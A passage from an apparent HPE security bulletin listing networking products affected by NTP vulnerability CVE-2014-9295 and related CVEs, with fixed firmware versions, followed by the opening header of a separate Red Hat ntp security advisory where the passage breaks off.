with 1 Fabric\nSlot, JE164A HP E7902 Switch Chassis, JE165A HP E7903 Switch Chassis, JE166A\nHP E7903 1 Fabric Slot Switch Chassis, JE167A HP E7906 Switch Chassis, JE168A\nHP E7906 Vertical Switch Chassis, JE169A HP E7910 Switch Chassis\n\n CVE-2014-9295\n\n5830 (Comware 5)\n R1118P11\n JC691A HP 5830AF-48G Switch with 1 Interface Slot, JC694A HP 5830AF-96G\nSwitch, JG316A HP 5830AF-48G TAA-compliant Switch w/1 Interface Slot, JG374A\nHP 5830AF-96G TAA-compliant Switch\n\n CVE-2014-9295\n\n5800 (Comware 5)\n R1809P03\n JC099A HP 5800-24G-PoE Switch, JC099B HP 5800-24G-PoE+ Switch, JC100A HP\n5800-24G Switch, JC100B HP 5800-24G Switch, JC101A HP 5800-48G Switch with 2\nSlots, JC101B HP 5800-48G-PoE+ Switch with 2 Interface Slots, JC103A HP\n5800-24G-SFP Switch, JC103B HP 5800-24G-SFP Switch with 1 Interface Slot,\nJC104A HP 5800-48G-PoE Switch, JC104B HP 5800-48G-PoE+ Switch with 1\nInterface Slot, JC105A HP 5800-48G Switch, JC105B HP 5800-48G Switch with 1\nInterface Slot, JG254A HP 5800-24G-PoE+ TAA-compliant Switch, JG254B HP\n5800-24G-PoE+ TAA-compliant Switch, JG255A HP 5800-24G TAA-compliant Switch,\nJG255B HP 5800-24G TAA-compliant Switch, JG256A HP 5800-24G-SFP TAA-compliant\nSwitch with 1 Interface Slot, JG256B HP 5800-24G-SFP TAA-compliant Switch\nwith 1 Interface Slot, JG257A HP 5800-48G-PoE+ TAA-compliant Switch with 1\nInterface Slot, JG257B HP 5800-48G-PoE+ TAA-compliant Switch with 1 Interface\nSlot, JG258A HP 5800-48G TAA-compliant Switch with 1 Interface Slot, JG258B\nHP 5800-48G TAA-compliant Switch with 1 Interface Slot, JG225A HP 5800AF-48G\nSwitch, JG225B HP 5800AF-48G Switch, JG242A HP 5800-48G-PoE+ TAA-compliant\nSwitch with 2 Interface Slots, JG242B HP 5800-48G-PoE+ TAA-compliant Switch\nwith 2 Interface\n\n CVE-2014-9295\n\n5820 (Comware 5)\n R1809P03\n JG243A HP 5820-24XG-SFP+ TAA-compliant Switch, JG243B HP 5820-24XG-SFP+\nTAA-compliant Switch, JG259A HP 5820X-14XG-SFP+ TAA-compliant Switch with 2\nInterface Slots \u0026 1 OAA Slot, JG259B HP 5820-14XG-SFP+ TAA-compliant Switch\nwith 2 Interface Slots and 1 OAA Slot, JC106A HP 5820-14XG-SFP+ Switch with 2\nSlots, JC106B HP 5820-14XG-SFP+ Switch with 2 Interface Slots \u0026 1 OAA Slot,\nJG219A HP 5820AF-24XG Switch, JG219B HP 5820AF-24XG Switch, JC102A HP\n5820-24XG-SFP+ Switch, JC102B HP 5820-24XG-SFP+ Switch\n\n CVE-2014-9295\n\n5500 HI (Comware 5)\n R5501P06\n JG311A HP 5500-24G-4SFP HI Switch with 2 Interface Slots, JG312A HP\n5500-48G-4SFP HI Switch with 2 Interface Slots, JG541A HP 5500-24G-PoE+-4SFP\nHI Switch with 2 Interface Slots, JG542A HP 5500-48G-PoE+-4SFP HI Switch with\n2 Interface Slots, JG543A HP 5500-24G-SFP HI Switch with 2 Interface Slots,\nJG679A HP 5500-24G-PoE+-4SFP HI TAA-compliant Switch with 2 Interface Slots,\nJG680A HP 5500-48G-PoE+-4SFP HI TAA-compliant Switch with 2 Interface Slots,\nJG681A HP 5500-24G-SFP HI TAA-compliant Switch with 2 Interface Slots\n\n CVE-2014-9295\n\n5500 EI (Comware 5)\n R2221P08\n JD373A HP 5500-24G DC EI Switch, JD374A HP 5500-24G-SFP EI Switch, JD375A HP\n5500-48G EI Switch, JD376A HP 5500-48G-PoE EI Switch, JD377A HP 5500-24G EI\nSwitch, JD378A HP 5500-24G-PoE EI Switch, JD379A HP 5500-24G-SFP DC EI\nSwitch, JG240A HP 5500-48G-PoE+ EI Switch with 2 Interface Slots, JG241A HP\n5500-24G-PoE+ EI Switch with 2 Interface Slots, JG249A HP 5500-24G-SFP EI\nTAA-compliant Switch with 2 Interface, JG250A HP 5500-24G EI TAA-compliant\nSwitch with 2 Interface Slots, JG251A HP 5500-48G EI TAA-compliant Switch\nwith 2 Interface Slots, JG252A HP 5500-24G-PoE+ EI TAA-compliant Switch with\n2 Interface Slots, JG253A HP 5500-48G-PoE+ EI TAA-compliant Switch with 2\nInterface Slots\n\n CVE-2014-9295\n\n4800G (Comware 5)\n R2221P08\n JD007A HP 4800-24G Switch, JD008A HP 4800-24G-PoE Switch, JD009A HP\n4800-24G-SFP Switch, JD010A HP 4800-48G Switch, JD011A HP 4800-48G-PoE Switch\n\n CVE-2014-9295\n\n5500SI (Comware 5)\n R2221P08\n JD369A HP 5500-24G SI Switch, JD370A HP 5500-48G SI Switch, JD371A HP\n5500-24G-PoE SI Switch, JD372A HP 5500-48G-PoE SI Switch, JG238A HP\n5500-24G-PoE+ SI Switch with 2 Interface Slots, JG239A HP 5500-48G-PoE+ SI\nSwitch with 2 Interface Slots\n\n CVE-2014-9295\n\n4500G (Comware 5)\n R2221P08\n JF428A HP 4510-48G Switch, JF847A HP 4510-24G Switch\n\n CVE-2014-9295\n\n5120 EI (Comware 5)\n R2221P08\n JE066A HP 5120-24G EI Switch, JE067A HP 5120-48G EI Switch, JE068A HP\n5120-24G EI Switch with 2 Interface Slots, JE069A HP 5120-48G EI Switch with\n2 Interface Slots, JE070A HP 5120-24G-PoE EI 2-slot Switch, JE071A HP\n5120-48G-PoE EI 2-slot Switch, JG236A HP 5120-24G-PoE+ EI Switch with 2\nInterface Slots, JG237A HP 5120-48G-PoE+ EI Switch with 2 Interface Slots,\nJG245A HP 5120-24G EI TAA-compliant Switch with 2 Interface Slots, JG246A HP\n5120-48G EI TAA-compliant Switch with 2 Interface Slots, JG247A HP\n5120-24G-PoE+ EI TAA-compliant Switch with 2 Slots, JG248A HP 5120-48G-PoE+\nEI TAA-compliant Switch with 2 Slots\n\n CVE-2014-9295\n\n4210G (Comware 5)\n R2221P08\n JF844A HP 4210-24G Switch, JF845A HP 4210-48G Switch, JF846A HP 4210-24G-PoE\nSwitch\n\n CVE-2014-9295\n\n5120 SI (Comware 5)\n R1513P95\n JE072A HP 5120-48G SI Switch, JE073A HP 5120-16G SI Switch, JE074A HP\n5120-24G SI Switch, JG091A HP 5120-24G-PoE+ (370W) SI Switch, JG092A HP\n5120-24G-PoE+ (170W) SI Switch\n\n CVE-2014-9295\n\n3610 (Comware 5)\n R5319P10\n JD335A HP 3610-48 Switch, JD336A HP 3610-24-4G-SFP Switch, JD337A HP\n3610-24-2G-2G-SFP Switch, JD338A HP 3610-24-SFP Switch\n\n CVE-2014-9295\n\n3600V2 (Comware 5)\n R2110P03\n JG299A HP 3600-24 v2 EI Switch, JG299B HP 3600-24 v2 EI Switch, JG300A HP\n3600-48 v2 EI Switch, JG300B HP 3600-48 v2 EI Switch, JG301A HP 3600-24-PoE+\nv2 EI Switch, JG301B HP 3600-24-PoE+ v2 EI Switch, JG301C HP 3600-24-PoE+ v2\nEI Switch, JG302A HP 3600-48-PoE+ v2 EI Switch, JG302B HP 3600-48-PoE+ v2 EI\nSwitch, JG302C HP 3600-48-PoE+ v2 EI Switch, JG303A HP 3600-24-SFP v2 EI\nSwitch, JG303B HP 3600-24-SFP v2 EI Switch, JG304A HP 3600-24 v2 SI Switch,\nJG304B HP 3600-24 v2 SI Switch, JG305A HP 3600-48 v2 SI Switch, JG305B HP\n3600-48 v2 SI Switch, JG306A HP 3600-24-PoE+ v2 SI Switch, JG306B HP\n3600-24-PoE+ v2 SI Switch, JG306C HP 3600-24-PoE+ v2 SI Switch, JG307A HP\n3600-48-PoE+ v2 SI Switch, JG307B HP 3600-48-PoE+ v2 SI Switch, JG307C HP\n3600-48-PoE+ v2 SI Switch\n\n CVE-2014-9295\n\n3100V2-48 (Comware 5)\n R2110P03\n JG315A HP 3100-48 v2 Switch, JG315B HP 3100-48 v2 Switch\n\n CVE-2014-9295\n\n3100V2 (Comware 5)\n R5203P11\n JD313B HP 3100-24-PoE v2 EI Switch, JD318B HP 3100-8 v2 EI Switch, JD319B HP\n3100-16 v2 EI Switch, JD320B HP 3100-24 v2 EI Switch, JG221A HP 3100-8 v2 SI\nSwitch, JG222A HP 3100-16 v2 SI Switch, JG223A HP 3100-24 v2 SI Switch\n\n CVE-2014-9295\n\nHP870 (Comware 5)\n R2607P35\n JG723A HP 870 Unified Wired-WLAN Appliance, JG725A HP 870 Unified Wired-WLAN\nTAA-compliant Appliance\n\n CVE-2014-9295\n\nHP850 (Comware 5)\n R2607P35\n JG722A HP 850 Unified Wired-WLAN Appliance, JG724A HP 850 Unified Wired-WLAN\nTAA-compliant Appliance\n\n CVE-2014-9295\n\nHP830 (Comware 5)\n R3507P35\n JG640A HP 830 24-Port PoE+ Unified Wired-WLAN Switch, JG641A HP 830 8-port\nPoE+ Unified Wired-WLAN Switch, JG646A HP 830 24-Port PoE+ Unified Wired-WLAN\nTAA-compliant Switch, JG647A HP 830 8-Port PoE+ Unified Wired-WLAN\nTAA-compliant\n\n CVE-2014-9295\n\nHP6000 (Comware 5)\n R2507P35\n JG639A HP 10500/7500 20G Unified Wired-WLAN Module, JG645A HP 10500/7500 20G\nUnified Wired-WLAN TAA-compliant Module\n\n CVE-2014-9295\n\nWX5004-EI (Comware 5)\n R2507P35\n JD447B HP WX5002 Access Controller, JD448A HP WX5004 Access Controller,\nJD448B HP WX5004 Access Controller, JD469A HP WX5004 Access Controller\n\n CVE-2014-9295\n\nSecBlade FW (Comware 5)\n R3181P05\n JC635A HP 12500 VPN Firewall Module, JD245A HP 9500 VPN Firewall Module,\nJD249A HP 10500/7500 Advanced VPN Firewall Module, JD250A HP 6600 Firewall\nProcessing Router Module, JD251A HP 8800 Firewall Processing Module, JD255A\nHP 5820 VPN Firewall Module\n\n CVE-2014-9295\n\nF1000-E (Comware 5)\n R3181P05\n JD272A HP F1000-E VPN Firewall Appliance\n\n CVE-2014-9295\n\nF1000-A-EI (Comware 5)\n R3734P06\n JG214A HP F1000-A-EI VPN Firewall Appliance\n\n CVE-2014-9295\n\nF1000-S-EI (Comware 5)\n R3734P06\n JG213A HP F1000-S-EI VPN Firewall Appliance\n\n CVE-2014-9295\n\nF5000-A (Comware 5)\n F3210P23\n JD259A HP A5000-A5 VPN Firewall Chassis, JG215A HP F5000 Firewall Main\nProcessing Unit, JG216A HP F5000 Firewall Standalone Chassis\n\n CVE-2014-9295\n\nU200S and CS (Comware 5)\n F5123P31\n JD273A HP U200-S UTM Appliance\n\n CVE-2014-9295\n\nU200A and M (Comware 5)\n F5123P31\n JD275A HP U200-A UTM Appliance\n\n CVE-2014-9295\n\nF5000-C/S (Comware 5)\n R3811P03\n JG650A HP F5000-C VPN Firewall Appliance, JG370A HP F5000-S VPN Firewall\nAppliance\n\n CVE-2014-9295\n\nSecBlade III (Comware 5)\n R3820P03\n JG371A HP 12500 20Gbps VPN Firewall Module, JG372A HP 10500/11900/7500\n20Gbps VPN Firewall Module\n\n CVE-2014-9295\n\nMSR20 RU (Comware 5 Low Encryption SW)\n R2513L61\n JD432A HP A-MSR20-21 Router, JD662A HP MSR20-20 Router, JD663A HP A-MSR20-21\nRouter, JD663B HP MSR20-21 Router, JD664A HP MSR20-40 Router, JF228A HP\nMSR20-40, JF283A HP MSR20-20 Router\n\n CVE-2014-9295\n\nMSR20-1X RU (Comware 5 Low Encryption SW)\n R2513L61\n JD431A HP MSR20-10 Router, JD667A HP A-MSR20-15 IW Multi-service Router,\nJD668A HP MSR20-13 Router, JD669A HP MSR20-13-W Router, JD670A HP A-MSR20-15\nA Multi-service Router, JD671A HP A-MSR20-15 AW Multi-service Router, JD672A\nHP A-MSR20-15 I Multi-service Router, JD673A HP MSR20-11 Router, JD674A HP\nMSR20-12 Router, JD675A HP MSR20-12-W Router, JD676A HP MSR20-12-T Router,\nJF236A HP MSR20-15-I Router, JF237A HP MSR20-15-A Router, JF238A HP\nMSR20-15-I-W Router, JF239A HP MSR20-11 Router, JF240A HP MSR20-13 Router,\nJF241A HP MSR20-12 Router, JF806A HP MSR20-12-T Router, JF807A HP MSR20-12-W\nRouter, JF808A HP MSR20-13-W Router, JF809A HP MSR20-15-A-W Router, JF817A HP\nMSR20-15 Router, JG209A HP MSR20-12-T-W Router, JG210A HP MSR20-13-W Router\n\n CVE-2014-9295\n\nMSR30 RU (Comware 5 Low Encryption SW)\n R2513L61\n JD654A HP MSR30-60 PoE Router, JD657A HP MSR30-40 Router, JD658A HP MSR30-60\nRouter, JD660A HP MSR30-20 PoE Router, JD661A HP MSR30-40 PoE Router, JD666A\nHP MSR30-20 Router, JF229A HP MSR30-40 Router, JF230A HP MSR30-60 Router,\nJF232A HP A-MSR30-40 (RT-MSR3040-AC-OVS-AS-H3) Multi-service Router, JF235A\nHP MSR30-20 DC Router, JF284A HP MSR30-20 Router, JF287A HP MSR30-40 DC\nRouter, JF801A HP MSR30-60 DC Router, JF802A HP MSR30-20 PoE Router, JF803A\nHP MSR30-40 PoE Router, JF804A HP MSR30-60 PoE Router, JG728A HP MSR30-20\nTAA-compliant DC Router, JG729A HP MSR30-20 TAA-compliant Router\n\n CVE-2014-9295\n\nMSR301X RU (Comware 5 Low Encryption SW)\n R2513L61\n JF800A HP MSR30-11 Router, JF816A HP MSR30-10 Router, JG182A HP MSR30-11E\nRouter, JG183A HP MSR30-11F Router, JG184A HP MSR30-10 DC Router\n\n CVE-2014-9295\n\nMSR316 RU (Comware 5 Low Encryption SW)\n R2513L61\n JD659A HP MSR30-16 PoE Router, JD665A HP MSR30-16 Router, JF233A HP MSR30-16\nRouter, JF234A HP MSR30-16 PoE Router\n\n CVE-2014-9295\n\nMSR50 RU (Comware 5 Low Encryption SW)\n R2513L61\n JD433A HP MSR50-40 Router, JD653A HP MSR50 Processor Module, JD655A HP MSR\n50-40 Router, JD656A HP MSR50-60 Router, JF231A HP MSR50-60 Router, JF285A HP\nMSR50-40 DC Router, JF640A HP MSR50-60 Router Chassis with DC Power Supply\n\n CVE-2014-9295\n\nMSR50 EPU RU (Comware 5 Low Encryption SW)\n R2513L61\n JD429A HP MSR50 G2 Processor Module, JD429B HP MSR50 G2 Processor Module,\nJD433A HP MSR50-40 Router, JD655A HP MSR 50-40 Router, JD656A HP MSR50-60\nRouter, JF231A HP MSR50-60 Router, JF285A HP MSR50-40 DC Router, JF640A HP\nMSR50-60 Router Chassis with DC Power Supply\n\n CVE-2014-9295\n\nMSR1000 RU (Comware 5 Low Encryption SW)\n R2513L61\n JG732A HP MSR1003-8 AC Router\n\n CVE-2014-9295\n\n6600 RSE RU (Comware 5 Low Encryption SW)\n R3303P18\n JC566A HP 6600 RSE-X1 Router Main Processing Unit, JG780A HP 6600 RSE-X1\nTAA-compliant Main Processing Unit\n\n CVE-2014-9295\n\n6600 RPE RU (Comware 5 Low Encryption SW)\n R3303P18\n JC165A) HP 6600 RPE-X1 Router Module, JG781A) HP 6600 RPE-X1 TAA-compliant\nMain Processing Unit\n\n CVE-2014-9295\n\n6602 RU (Comware 5 Low Encryption SW)\n R3303P18\n JC176A) HP 6602 Router Chassis\n\n CVE-2014-9295\n\nHSR6602 RU (Comware 5 Low Encryption SW)\n R3303P18\n JC177A HP 6608 Router, JC177B HP 6608 Router Chassis, JC178A HP 6604 Router\nChassis, JC178B HP 6604 Router Chassis, JC496A HP 6616 Router Chassis, JG353A\nHP HSR6602-G Router, JG354A HP HSR6602-XG Router, JG355A HP 6600 MCP-X1\nRouter Main Processing Unit, JG356A HP 6600 MCP-X2 Router Main Processing\nUnit, JG776A HP HSR6602-G TAA-compliant Router, JG777A HP HSR6602-XG\nTAA-compliant Router, JG778A HP 6600 MCP-X2 Router TAA-compliant Main\nProcessing Unit\n\n CVE-2014-9295\n\nHSR6800 RU (Comware 5 Low Encryption SW)\n R3303P18\n JG361A HP HSR6802 Router Chassis, JG362A HP HSR6804 Router Chassis, JG363A\nHP HSR6808 Router Chassis, JG364A HP HSR6800 RSE-X2 Router Main Processing\nUnit, JG779A HP HSR6800 RSE-X2 Router TAA-compliant Main Processing Unit\n\n CVE-2014-9295\n\nSMB1910 (Comware 5)\n R1108\n JG540A HP 1910-48 Switch, JG539A HP 1910-24-PoE+ Switch, JG538A HP 1910-24\nSwitch, JG537A HP 1910-8 -PoE+ Switch, JG536A HP 1910-8 Switch\n\n CVE-2014-9295\n\nSMB1920 (Comware 5)\n R1106\n JG928A HP 1920-48G-PoE+ (370W) Switch, JG927A HP 1920-48G Switch, JG926A HP\n1920-24G-PoE+ (370W) Switch, JG925A HP 1920-24G-PoE+ (180W) Switch, JG924A HP\n1920-24G Switch, JG923A HP 1920-16G Switch, JG922A HP 1920-8G-PoE+ (180W)\nSwitch, JG921A HP 1920-8G-PoE+ (65W) Switch, JG920A HP 1920-8G Switch\n\n CVE-2014-9295\n\nV1910 (Comware 5)\n R1513P95\n JE005A HP 1910-16G Switch, JE006A HP 1910-24G Switch, JE007A HP 1910-24G-PoE\n(365W) Switch, JE008A HP 1910-24G-PoE(170W) Switch, JE009A HP 1910-48G\nSwitch, JG348A HP 1910-8G Switch, JG349A HP 1910-8G-PoE+ (65W) Switch, JG350A\nHP 1910-8G-PoE+ (180W) Switch\n\n CVE-2014-9295\n\nSMB 1620 (Comware 5)\n R1105\n JG914A HP 1620-48G Switch, JG913A HP 1620-24G Switch, JG912A HP 1620-8G\nSwitch\n\n CVE-2014-9295\n\nCOMWARE 7 Products\n\n12500 (Comware 7)\n R7328P04\n JC085A HP A12518 Switch Chassis, JC086A HP A12508 Switch Chassis, JC652A HP\n12508 DC Switch Chassis, JC653A HP 12518 DC Switch Chassis, JC654A HP 12504\nAC Switch Chassis, JC655A HP 12504 DC Switch Chassis, JF430A HP A12518 Switch\nChassis, JF430B HP 12518 Switch Chassis, JF430C HP 12518 AC Switch Chassis,\nJF431A HP A12508 Switch Chassis, JF431B HP 12508 Switch Chassis, JF431C HP\n12508 AC Switch Chassis, JC072B HP 12500 Main Processing Unit, JG497A HP\n12500 MPU w/Comware V7 OS, JG782A HP FF 12508E AC Switch Chassis, JG783A HP\nFF 12508E DC Switch Chassis, JG784A HP FF 12518E AC Switch Chassis, JG785A HP\nFF 12518E DC Switch Chassis, JG802A HP FF 12500E MPU, JG836A HP FlexFabric\n12518E AC Switch TAA-compliant Chassis, JG834A HP FlexFabric 12508E AC Switch\nTAA-compliant Chassis, JG835A HP FlexFabric 12508E DC Switch TAA-compliant\nChassis, JG837A HP FlexFabric 12518E DC Switch TAA-compliant Chassis, JG803A\nHP FlexFabric 12500E TAA-compliant Main Processing Unit, JG796A HP FlexFabric\n12500 48-port 10GbE SFP+ FD Module, JG790A HP FlexFabric 12500 16-port 40GbE\nQSFP+ FD Module, JG794A HP FlexFabric 12500 40-port 10GbE SFP+ FG Module,\nJG792A HP FlexFabric 12500 40-port 10GbE SFP+ FD Module, JG788A HP FlexFabric\n12500 4-port 100GbE CFP FG Module, JG786A HP FlexFabric 12500 4-port 100GbE\nCFP FD Module, JG797A HP FlexFabric 12500 48-port 10GbE SFP+ FD TAA-compliant\nModule, JG791A HP FlexFabric 12500 16-port 40GbE QSFP+ FD TAA-compliant\nModule, JG795A HP FlexFabric 12500 40-port 10GbE SFP+ FG TAA-compliant\nModule, JG793A HP FlexFabric 12500 40-port 10GbE SFP+ FD TAA-compliant\nModule, JG789A HP FlexFabric 12500 4-port 100GbE CFP FG TAA-compliant Module,\nJG787A HP FlexFabric 12500 4-port 100GbE CFP FD TAA-compliant Module, JG798A\nHP FlexFabric 12508E Fabric Module\n H3C S12508 Routing Switch (AC-1) (0235A0GE), H3C S12518 Routing Switch\n(AC-1) (0235A0GF), H3C S12508 Chassis (0235A0E6), H3C S12508 Chassis\n(0235A38N), H3C S12518 Chassis (0235A0E7), H3C S12518 Chassis (0235A38M), H3C\n12508 DC Switch Chassis (0235A38L), H3C 12518 DC Switch Chassis (0235A38K)\n CVE-2014-9295\n\n11900 (Comware 7)\n R7169P01\n JG608A HP FF 11908-V Switch Chassis, JG609A HP FF 11900 Main Processing\nUnit, JG610A HP FF 11908 1.92Tbps Type D Fabric Module, JG611A HP FF 11900\n32p 10GbE SFP+ SF Module, JG612A HP FF 11900 48p 10GbE SFP+ SF Module, JG613A\nHP FF 11900 4p 40GbE QSFP+ SF Module, JG614A HP FF 11900 8p 40GbE QSFP+ SF\nModule, JG615A HP FF 11900 24-p 1/10GBASE-T SF Module, JG616A HP FF 11900\n2500W AC Power Supply, JG617A HP FF 11900 2400W DC Power Supply, JG618A HP FF\n11908-V Spare Fan Assy, JG918A HP FF 11900 2p 100GbE CFP SE Module\n\n CVE-2014-9295\n\n10500 (Comware 7)\n R7150\n JC611A HP 10508-V Switch Chassis, JC612A HP 10508 Switch Chassis, JC613A HP\n10504 Switch Chassis, JC748A HP 10512 Switch Chassis, JG820A HP 10504 TAA\nSwitch Chassis, JG821A HP 10508 TAA Switch Chassis, JG822A HP 10508-V TAA\nSwitch Chassis, JG823A HP 10512 TAA Switch Chassis, JG496A HP 10500 Type A\nMPU w/Comware v7 OS, JH198A HP 10500 Type D Main Processing Unit with Comware\nv7 Operating System, JH191A HP 10500 44-port GbE(SFP,LC)/ 4-port 10GbE SFP+\n(SFP+,LC) SE Module, JH192A HP 10500 48-port Gig-TRJ45SE Module, JH193A HP\n10500 16-port 10GbE SFP+ (SFP+,LC) SF Module, JH194A HP 10500 24-port 10GbE\nSFP+ (SFP+,LC) EC Module, JH195A HP 10500 6-port 40GbE QSFP+ EC Module,\nJH196A HP 10500 2-port 100GbE CFP EC Module, JH197A HP 10500 48-port 10GbE\nSFP+ (SFP+,LC) SG Module\n N/A\n CVE-2014-9295\n\n12900 (Comware 7)\n R1112\n JG619A HP FlexFabric 12910 Switch AC Chassis, JG621A HP FlexFabric 12910\nMain Processing Unit, JG632A HP FlexFabric 12916 Switch AC Chassis, JG634A HP\nFlexFabric 12916 Main Processing Unit\n\n CVE-2014-9295\n\n5900 (Comware 7)\n R2311P06\n JC772A HP 5900AF-48XG-4QSFP+ Switch, JG336A HP 5900AF-48XGT-4QSFP+ Switch,\nJG510A HP 5900AF-48G-4XG-2QSFP+ Switch, JG554A HP 5900AF-48XG-4QSFP+ TAA\nSwitch, JG838A HP FF 5900CP-48XG-4QSFP+ Switch, JH036A HP FlexFabric 5900CP\n48XG 4QSFP+ TAA-Compliant, JH037A HP 5900AF 48XGT 4QSFP+ TAA-Compliant\nSwitch, JH038A) HP 5900AF 48G 4XG 2QSFP+ TAA-Compliant\n\n CVE-2014-9295\n\n5920 (Comware 7)\n R2311P06\n JG296A HP 5920AF-24XG Switch, JG555A HP 5920AF-24XG TAA Switch\n\n CVE-2014-9295\n\nMSR1000 (Comware 7)\n R0106P31\n JG875A HP MSR1002-4 AC Router, JH060A HP MSR1003-8S AC Router\n\n CVE-2014-9295\n\nMSR2000 (Comware 7)\n R0106P31\n JG411A HP MSR2003 AC Router, JG734A HP MSR2004-24 AC Router, JG735A) HP\nMSR2004-48 Router, JG866A HP MSR2003 TAA-compliant AC Router\n\n CVE-2014-9295\n\nMSR3000 (Comware 7)\n R0106P31\n JG404A HP MSR3064 Router, JG405A HP MSR3044 Router, JG406A HP MSR3024 AC\nRouter, JG407A HP MSR3024 DC Router, JG408A HP MSR3024 PoE Router, JG409A HP\nMSR3012 AC Router, JG410A HP MSR3012 DC Router, JG861A HP MSR3024\nTAA-compliant AC Router\n\n CVE-2014-9295\n\nMSR4000 (Comware 7)\n R0106P31\n JG402A HP MSR4080 Router Chassis, JG403A HP MSR4060 Router Chassis, JG412A\nHP MSR4000 MPU-100 Main Processing Unit, JG869A HP MSR4000 TAA-compliant\nMPU-100 Main Processing Unit\n\n CVE-2014-9295\n\n5800 (Comware 7)\n R7006P12\n JC099A HP 5800-24G-PoE Switch, JC099B HP 5800-24G-PoE+ Switch, JC100A HP\n5800-24G Switch, JC100B HP 5800-24G Switch, JC101A HP 5800-48G Switch with 2\nSlots, JC101B HP 5800-48G-PoE+ Switch with 2 Interface Slots, JC103A HP\n5800-24G-SFP Switch, JC103B HP 5800-24G-SFP Switch with 1 Interface Slot,\nJC104A HP 5800-48G-PoE Switch, JC104B HP 5800-48G-PoE+ Switch with 1\nInterface Slot, JC105A HP 5800-48G Switch, JC105B HP 5800-48G Switch with 1\nInterface Slot, JG254A HP 5800-24G-PoE+ TAA-compliant Switch, JG254B HP\n5800-24G-PoE+ TAA-compliant Switch, JG255A HP 5800-24G TAA-compliant Switch,\nJG255B HP 5800-24G TAA-compliant Switch, JG256A HP 5800-24G-SFP TAA-compliant\nSwitch with 1 Interface Slot, JG256B HP 5800-24G-SFP TAA-compliant Switch\nwith 1 Interface Slot, JG257A HP 5800-48G-PoE+ TAA-compliant Switch with 1\nInterface Slot, JG257B HP 5800-48G-PoE+ TAA-compliant Switch with 1 Interface\nSlot, JG258A HP 5800-48G TAA-compliant Switch with 1 Interface Slot, JG258B\nHP 5800-48G TAA-compliant Switch with 1 Interface Slot, JG225A HP 5800AF-48G\nSwitch, JG225B HP 5800AF-48G Switch, JG242A HP 5800-48G-PoE+ TAA-compliant\nSwitch with 2 Interface Slots, JG242B HP 5800-48G-PoE+ TAA-compliant Switch\nwith 2 Interface Slots, JG243A HP 5820-24XG-SFP+ TAA-compliant Switch, JG243B\nHP 5820-24XG-SFP+ TAA-compliant Switch, JG259A HP 5820X-14XG-SFP+\nTAA-compliant Switch with 2 Interface Slots \u0026 1 OAA Slot, JG259B HP\n5820-14XG-SFP+ TAA-compliant Switch with 2 Interface Slots and 1 OAA Slot,\nJC106A HP 5820-14XG-SFP+ Switch with 2 Slots, JC106B HP 5820-14XG-SFP+ Switch\nwith 2 Interface Slots \u0026 1 OAA Slot, JG219A HP 5820AF-24XG Switch, JG219B HP\n5820AF-24XG Switch, JC102A HP 5820-24XG-SFP+ Switch, JC102B HP 5820-24XG-SFP+\nSwitch\n\n CVE-2014-9295\n\nVSR (Comware 7)\n R0204P01\n JG810AAE HP VSR1001 Virtual Services Router 60 Day Evaluation Software,\nJG811AAE HP VSR1001 Comware 7 Virtual Services Router, JG812AAE HP VSR1004\nComware 7 Virtual Services Router, JG813AAE HP VSR1008 Comware 7 Virtual\nServices Router\n\n CVE-2014-9295\n\n7900 (Comware 7)\n R2122\n JG682A HP FlexFabric 7904 Switch Chassis, JG841A HP FlexFabric 7910 Switch\nChassis, JG842A HP FlexFabric 7910 7.2Tbps Fabric / Main Processing Unit,\nJH001A HP FlexFabric 7910 2.4Tbps Fabric / Main Processing Unit\n\n CVE-2014-9295\n\n5130 (Comware 7)\n R3108P03\n JG932A HP 5130-24G-4SFP+ EI Switch, JG933A HP 5130-24G-SFP-4SFP+ EI Switch,\nJG934A HP 5130-48G-4SFP+ EI Switch, JG936A HP 5130-24G-PoE+-4SFP+ (370W) EI\nSwitch, JG937A HP 5130-48G-PoE+-4SFP+ (370W) EI Switch, JG975A HP\n5130-24G-4SFP+ EI Brazil Switch, JG976A HP 5130-48G-4SFP+ EI Brazil Switch,\nJG977A HP 5130-24G-PoE+-4SFP+ (370W) EI Brazil Switch, JG978A HP\n5130-48G-PoE+-4SFP+ (370W) EI Brazil Switch\n\n CVE-2014-9295\n\n5700 (Comware 7)\n R2311P06\n JG894A HP FlexFabric 5700-48G-4XG-2QSFP+ Switch, JG895A HP FlexFabric\n5700-48G-4XG-2QSFP+ TAA-compliant Switch, JG896A HP FlexFabric\n5700-40XG-2QSFP+ Switch, JG897A HP FlexFabric 5700-40XG-2QSFP+ TAA-compliant\nSwitch, JG898A HP FlexFabric 5700-32XGT-8XG-2QSFP+ Switch, JG899A HP\nFlexFabric 5700-32XGT-8XG-2QSFP+ TAA-compliant Switch\n\n CVE-2014-9295\n\nVCX\n 9.8.17\n J9672A HP VCX V7205 Platform w/ DL360 G7 Srvr, J9668A HP VCX IPC V7005\nPltfrm w/ DL120 G6 Srvr, JC517A HP VCX V7205 Platform w/DL 360 G6 Server,\nJE355A HP VCX V6000 Branch Platform 9.0, JC516A HP VCX V7005 Platform w/DL\n120 G6 Server, JC518A HP VCX Connect 200 Primry 120 G6 Server, J9669A HP VCX\nIPC V7310 Pltfrm w/ DL360 G7 Srvr, JE341A HP VCX Connect 100 Secondary,\nJE252A HP VCX Connect Primary MIM Module, JE253A HP VCX Connect Secondary MIM\nModule, JE254A HP VCX Branch MIM Module, JE355A HP VCX V6000 Branch Platform\n9.0, JD028A HP MS30-40 RTR w/VCX + T1/FXO/FXS/Mod, JD023A HP MSR30-40 Router\nwith VCX MIM Module, JD024A HP MSR30-16 RTR w/VCX Ent Br Com MIM, JD025A HP\nMSR30-16 RTR w/VCX + 4FXO/2FXS Mod, JD026A HP MSR30-16 RTR w/VCX + 8FXO/4FXS\nMod, JD027A HP MSR30-16 RTR w/VCX + 8BRI/4FXS Mod, JD029A HP MSR30-16 RTR\nw/VCX + E1/4BRI/4FXS, JE340A HP VCX Connect 100 Pri Server 9.0, JE342A HP VCX\nConnect 100 Sec Server 9.0\n\n CVE -2014-9293 CVE-2014-9294 CVE-2014-9295\n\nHISTORY\nVersion:1 (rev.1) - 9 December 2015 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running Hewlett Packard Enterprise (HPE) software\nproducts should be applied in accordance with the customer\u0027s patch management\npolicy. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: ntp security update\nAdvisory ID: RHSA-2015:0104-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2015-0104.html\nIssue date: 2015-01-28\nCVE Names: 